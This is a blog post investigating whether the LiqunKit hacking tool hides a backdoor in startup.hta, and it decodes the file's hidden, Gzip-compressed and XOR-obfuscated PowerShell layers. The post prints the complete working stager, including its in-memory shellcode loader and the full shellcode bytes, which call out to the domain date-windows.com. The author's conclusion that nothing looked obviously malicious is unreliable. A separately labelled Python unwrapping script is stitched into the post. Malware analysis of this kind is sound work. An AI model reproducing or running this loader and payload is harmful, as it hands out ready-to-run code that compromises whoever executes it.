A PowerShell decoding exercise (they say the LiqunKit modules have a backdoor?)

Penetration techniques · 2 years ago (2021) · admin

Background

Out of nowhere, someone in the group posted screenshots of LiqunKit being flagged as malware, and then people started saying it had a backdoor, abnormal traffic, and so on.

As it happened, I had seen this tool on t00ls a moment earlier.

Project: https://github.com/Liqunkit/LiqunKit_

[screenshots]

———————————————————————————————–

A backdoor did not seem plausible to me, and the screenshots in the group were all just results from uploading the files to ThreatBook (微步) and VirusTotal,

[screenshot]

which proves very little; it felt like people talking off the cuff. The developer ships exploitation modules for Redis and the like, and hacking tools of this kind have always been flagged by AV, haven't they?

Here is the file listing:

[screenshot]

The modules the author provides handle Redis; everything else is plain text. Yet a bunch of people claimed the tool had a backdoor, pointing for example at

startup.hta

Its content is as follows:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand 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");</SCRIPT>

Someone then complained about this part:

 -nop -w hidden -encodedcommand 

So I figured, why not just decode it and find out? Besides, if you are going to claim someone's tool has a backdoor, what good does mumbling about ThreatBook/VT results do? Then again, what if there really is one?

Getting started

Original:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand 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");</SCRIPT>

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

Base64-decoded:

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Base64-decode the inner string in turn:

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
[screenshot]

The result looks like garbage, so look further along the script:

New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)

It is Gzip-compressed, so decompress it with a script to produce the sample file:

import base64

code2 = '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'
# The inner blob is raw Gzip bytes, not text, so just base64-decode it and write the bytes out
code2ed = base64.b64decode(code2)
with open("decoded.gzip", 'wb') as f:
    f.write(code2ed)

Decompress the Gzip:

[screenshot]

This yields the file decoded:

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

Another string appears:

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

It can be run in PowerShell:

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')
for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

 

After the XOR:

[screenshot]

Convert the decimal values to hex:

import binascii

content = ("252 232 137 0 0 0 96 137 229 49 210 100 139 82 48 139 82 12 139 82 20 139 114 40 15 183 74 38 49 255 49 192 172 60 97 124 2 44 32 193 207 13 1 199 226 240 82 87 139 82 16 139 66 60 1 208 139 64 120 133 192 116 74 1 208 80 139 72 24 139 88 32 1 211 227 60 73 139 52 139 1 214 49 255 49 192 172 193 207 13 1 199 56 224 117 244 3 125 248 59 125 36 117 226 88 139 88 36 1 211 102 139 12 75 139 88 28 1 211 139 4 139 1 208 137 68 36 36 91 91 97 89 90 81 255 224 88 95 90 139 18 235 134 93 104 110 101 116 0 104 119 105 110 105 84 104 76 119 38 7 255 213 232 0 0 0 0 49 255 87 87 87 87 87 104 58 86 121 167 255 213 233 164 0 0 0 91 49 201 81 81 106 3 81 81 104 187 1 0 0 83 80 104 87 137 159 198 255 213 80 233 140 0 0 0 91 49 210 82 104 0 50 192 132 82 82 82 83 82 80 104 235 85 46 59 255 213 137 198 131 195 80 104 128 51 0 0 137 224 106 4 80 106 31 86 104 117 70 158 134 255 213 95 49 255 87 87 106 255 83 86 104 45 6 24 123 255 213 133 192 15 132 202 1 0 0 49 255 133 246 116 4 137 249 235 9 104 170 197 226 93 255 213 137 193 104 69 33 94 49 255 213 49 255 87 106 7 81 86 80 104 183 87 224 11 255 213 191 0 47 0 0 57 199 117 7 88 80 233 123 255 255 255 49 255 233 145 1 0 0 233 201 1 0 0 232 111 255 255 255 47 105 90 99 54 0 228 252 193 16 215 124 98 24 9 249 225 6 76 3 15 113 228 80 9 86 237 10 219 87 168 67 59 186 14 163 172 126 140 15 84 213 234 12 92 195 44 37 12 71 208 23 47 23 48 194 11 36 221 4 26 234 11 51 191 221 239 170 107 79 96 164 108 199 178 77 238 248 20 0 85 115 101 114 45 65 103 101 110 116 58 32 77 105 99 114 111 115 111 102 116 32 78 84 80 32 118 32 49 46 48 13 10 0 141 52 138 162 176 56 52 198 42 46 63 51 127 153 129 193 189 252 204 232 77 235 38 200 234 184 27 28 74 160 130 123 66 162 152 23 140 14 30 67 13 122 103 104 212 93 128 20 243 89 208 70 194 122 210 194 96 242 143 203 236 189 135 104 78 20 77 215 138 161 136 35 182 253 132 246 62 90 192 206 79 75 205 16 6 8 145 27 47 55 252 48 113 117 153 15 38 142 77 246 11 174 122 199 196 147 198 44 70 63 167 "
           "191 22 174 102 168 212 116 168 167 1 86 251 26 222 138 125 189 138 238 176 55 30 108 80 22 125 21 125 202 150 117 120 66 8 181 124 226 121 104 54 141 216 48 188 35 227 103 135 127 66 124 19 173 7 125 230 117 0 36 1 8 108 33 37 130 46 67 53 196 38 136 170 250 48 115 104 178 111 17 79 138 33 228 26 245 125 175 127 145 88 183 154 225 121 211 113 212 28 231 16 4 184 160 49 192 126 83 36 8 82 101 206 78 6 114 41 64 136 97 165 38 144 54 181 49 199 164 32 220 194 160 82 122 41 16 159 150 118 203 253 14 11 230 175 130 28 187 19 252 145 199 210 127 161 207 150 17 3 0 104 240 181 162 86 255 213 106 64 104 0 16 0 0 104 0 0 64 0 87 104 88 164 83 229 255 213 147 185 0 0 0 0 1 217 81 83 137 231 87 104 0 32 0 0 83 86 104 18 150 137 226 255 213 133 192 116 198 139 7 1 195 133 192 117 229 88 195 232 137 253 255 255 116 105 109 101 46 100 97 116 101 45 119 105 110 100 111 119 115 46 99 111 109 0 18 52 86 120")

# PowerShell printed the XORed bytes as decimal values; turn each one into two hex digits
hex_arrays = content.split()
print(hex_arrays)
pe_list = []
for value in hex_arrays:
    pe_list.append('%02x' % int(value, 10))

pe_str = "".join(pe_list)
content = binascii.a2b_hex(pe_str)
# write the raw bytes out as the shellcode sample for scdbg
with open("ps_shellcode", 'wb') as pe_file:
    pe_file.write(content)

Generating the shellcode:

[screenshots]

Then analyse it with the malware-analysis tool scdbg.exe. I cannot fully read the output, but following the usual routine, nothing looked obviously malicious:

[screenshots]

Static analysis:

[screenshot]

The domain involved, date-windows.com, is currently unregistered:

[screenshot]
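The whole chain the post walks through by hand (UTF-16LE base64 for -encodedcommand, an inner base64 blob that is Gzip, then a FromBase64String blob undone by the -bxor 35 loop) can be scripted. This is an added example, not code from the post or from LiqunKit; it builds a constructed sample inside the script rather than using the real startup.hta payload, and finishes with the printable-string pass that, on the real bytes, surfaces strings such as the date-windows.com domain the post found.

```python
import base64
import gzip
import re

XOR_KEY = 35  # the '-bxor 35' loop in the decoded stager

def decode_encodedcommand(b64):
    """Layer 1: -encodedcommand is base64 of UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")

def extract_b64_blobs(script):
    """Every FromBase64String('...') / ("...") argument in a script."""
    return re.findall(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", script)

def find_xor_key(script):
    m = re.search(r"-bxor\s+(\d+)", script)
    return int(m.group(1)) if m else None

def unwrap_stager(encoded):
    """Layer 2: inner base64 -> Gzip -> real script; layer 3: blob XOR key -> bytes."""
    wrapper = decode_encodedcommand(encoded)
    inner = gzip.decompress(base64.b64decode(extract_b64_blobs(wrapper)[0]))
    script = inner.decode("utf-8", "replace")
    key = find_xor_key(script)
    blobs = extract_b64_blobs(script)
    if key is None or not blobs:
        raise ValueError("no '-bxor N' loop or FromBase64String blob in inner script")
    return script, bytes(b ^ key for b in base64.b64decode(blobs[0]))

def printable_strings(data, min_len=6):
    """Runs of printable ASCII: the quick static check that surfaces domains and User-Agents."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

# Constructed sample, not the page's payload: a stand-in byte string wrapped in the same
# three layers as startup.hta (XOR 35 + base64, then Gzip + base64, then UTF-16LE + base64).
FAKE_SHELLCODE = b"\x90\x90placeholder-c2.invalid\x00User-Agent: test\x00"
_inner = ("[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
          "for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor 35 }\n"
          % base64.b64encode(bytes(b ^ XOR_KEY for b in FAKE_SHELLCODE)).decode())
_wrapper = ('$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
            "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
            "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();"
            % base64.b64encode(gzip.compress(_inner.encode())).decode())
SAMPLE_ENCODEDCOMMAND = base64.b64encode(_wrapper.encode("utf-16-le")).decode()

if __name__ == "__main__":
    script, shellcode = unwrap_stager(SAMPLE_ENCODEDCOMMAND)
    print(script)
    print(printable_strings(shellcode))
```

To run it on the real sample, replace SAMPLE_ENCODEDCOMMAND with the -encodedcommand argument taken from startup.hta and inspect the returned strings before anything is executed.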

 

For a laugh: [screenshots]

Further reading (commentary/background):

References:

https://www.anquanke.com/post/id/87039

https://www.freebuf.com/articles/system/181697.html

https://www.freebuf.com/news/topnews/245220.html

https://www.cnblogs.com/ring-lcy/p/12794017.html

Originally published on the WeChat public account PeiQi文库: A PowerShell decoding exercise (they say the LiqunKit modules have a backdoor?)

Copyright notice: posted by admin on 30 November 2021 at 6:43 AM.
